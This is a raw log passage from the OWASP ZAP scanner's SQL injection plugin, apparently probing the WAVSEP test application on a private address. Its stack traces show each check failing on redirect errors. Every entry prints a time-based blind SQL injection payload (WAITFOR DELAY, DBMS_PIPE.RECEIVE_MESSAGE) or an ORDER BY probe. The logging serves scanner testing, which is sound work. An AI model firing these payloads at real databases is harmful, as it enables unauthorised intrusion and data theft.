at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680744 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8080=8080] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8080=8080 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680744 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1632=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(69)||CHR(82)||CHR(79),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 1632=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(69)||CHR(82)||CHR(79),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680745 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680746 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 9990=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(84)||CHR(101)||CHR(79),5) AND ('pkKl'='pkKl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 9990=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(84)||CHR(101)||CHR(79),5) AND ('pkKl'='pkKl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680746 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('HaHC'='HaHC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('HaHC'='HaHC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680747 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 9539=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(100)||CHR(85)||CHR(116),5) AND 'QqVW'='QqVW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9539=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(100)||CHR(85)||CHR(116),5) AND 'QqVW'='QqVW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680748 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'XwoA'='XwoA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'XwoA'='XwoA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680748 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 5765=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(84)||CHR(122)||CHR(103),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5765=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(84)||CHR(122)||CHR(103),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680750 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4716=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(114)||CHR(74)||CHR(116),5)-- CPqM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4716=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(114)||CHR(74)||CHR(116),5)-- CPqM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680750 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680751 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680751 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Grkq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Grkq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 